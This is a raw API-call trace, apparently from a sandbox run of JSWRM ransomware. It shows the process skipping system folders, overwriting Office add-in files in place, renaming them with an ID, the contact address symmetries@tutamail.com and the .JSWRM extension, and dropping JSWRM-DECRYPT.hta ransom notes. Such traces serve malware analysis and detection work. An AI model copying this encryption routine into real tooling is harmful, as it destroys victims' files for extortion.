[0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2=".") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="..") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="...") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="windows") returned -1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="recovery") returned -1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="perflogs") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="documents and settings") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="system volume information") returned -1 [0123.838] lstrcmpiW (lpString1="PowerViewRes.es.xap", lpString2="msocache") returned 1 [0123.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.es.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.es.xap", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.es.xap", lpUsedDefaultChar=0x0) returned 19 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.es.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.es.xap", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.es.xap", lpUsedDefaultChar=0x0) returned 19 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\PowerViewRes.es.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\powerviewres.es.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.839] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323981) returned 1 [0123.839] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.840] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.853] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.853] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.964] CloseHandle (hObject=0x338) returned 1 [0123.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0123.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0123.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\PowerViewRes.es.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\powerviewres.es.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\PowerViewRes.es.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\powerviewres.es.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0123.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2="...") returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2="windows") returned -1 [0123.980] lstrcmpiW (lpString1="et", lpString2="recovery") returned -1 [0123.980] lstrcmpiW (lpString1="et", lpString2="perflogs") returned -1 [0123.980] lstrcmpiW (lpString1="et", lpString2="documents and settings") returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2="$RECYCLE.BIN") returned 1 [0123.980] lstrcmpiW (lpString1="et", lpString2="system volume information") returned -1 [0123.980] lstrcmpiW (lpString1="et", lpString2="msocache") returned -1 [0123.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0123.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0123.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0123.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0123.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0123.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\jswrm-decrypt.hta")) returned 0xffffffff [0123.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0123.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0123.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.984] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.985] CloseHandle (hObject=0x314) returned 1 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0123.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\jswrm-decrypt.hta")) returned 0x20 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0123.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0123.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.985] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x408e5353, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0123.985] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.985] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x408e5353, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.986] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.986] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.986] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b3bafd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b3bafd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3e58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.986] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 